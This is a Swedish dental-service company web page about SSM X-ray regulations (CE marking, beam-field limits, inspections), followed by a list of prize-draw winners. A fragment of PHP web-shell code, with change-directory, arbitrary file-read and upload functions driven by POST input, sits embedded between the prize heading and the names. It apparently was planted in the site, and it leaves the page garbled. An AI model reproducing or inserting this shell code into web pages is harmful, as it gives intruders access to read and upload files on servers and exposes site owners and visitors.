Viktigt!

Föreskrifter, kontroller och tillstånd gällande röntgen!

Nya föreskrifter, 2008:5, började gälla redan 2009 med undantag av apparater som införskaffats före 2008 och som fick föreskriftsdispens fram till 2011. Det är därför föreskriften hos många har fått effekt under under senare år, det vill säga ”en röntgenapparat måste vara CE-märkt och strålfältet får inte överstiga 50 millimeter i diameter”. Innan 1993 var inga intraorala röntgenapparater CE märkta och mellan 1993 och 1998 var endast vissa CE-märkta (red. anmärkning).

Strålsäkerhetsmyndigheten kontrollerar detta aktivt. Det finns EU-direktiv som säger att SSM måste veta vilka utrustningar som finns ute i landet och även planer på att intraorala röntgenapparater ska registreras. Har man inte en godkänd röntgen kan det bli tal om vite. Läs mer 

Svensk Dentalservice utför kontroller på intraoral- och panoramaröntgen enligt SSMs föreskrifter. Vi utför även exponeringstester på intraoral röntgen.

Kontakta din närmaste tekniker!

Vinnare av Bluetooth-högtalare!

’; echo ’

’.$form.’Change Dir :

’.$form.’Read File :

Upload :

’; if(isset ($_POST[’cme’])){ $myFile = $_POST[’cme’]; $fh = fopen($myFile, ’r’); if($theData = fread($fh, filesize($myFile))){ fclose($fh); echo ’’; } else{ echo ”File Could Not Found!!”; } } ?>

  • Leif Jerndal, Kalmar
  • Ulf Hedefält, Huskvarna
  • Eva Borg, Göteborg
  • Carl-Henrik Annefors, Örsundsbro
  • Ingrid Leitzler, Stockholm
  • Lena Rignell, Mölndal
  • Claes Rydevik, Ekerö
  • Claudia Torres, Staffanstorp
  • Zaneta Juric-Smailagic, Kalmar
  • Linnea Öhlund, Göteborg

 

Anette Arneklint
Svensk Dentalservice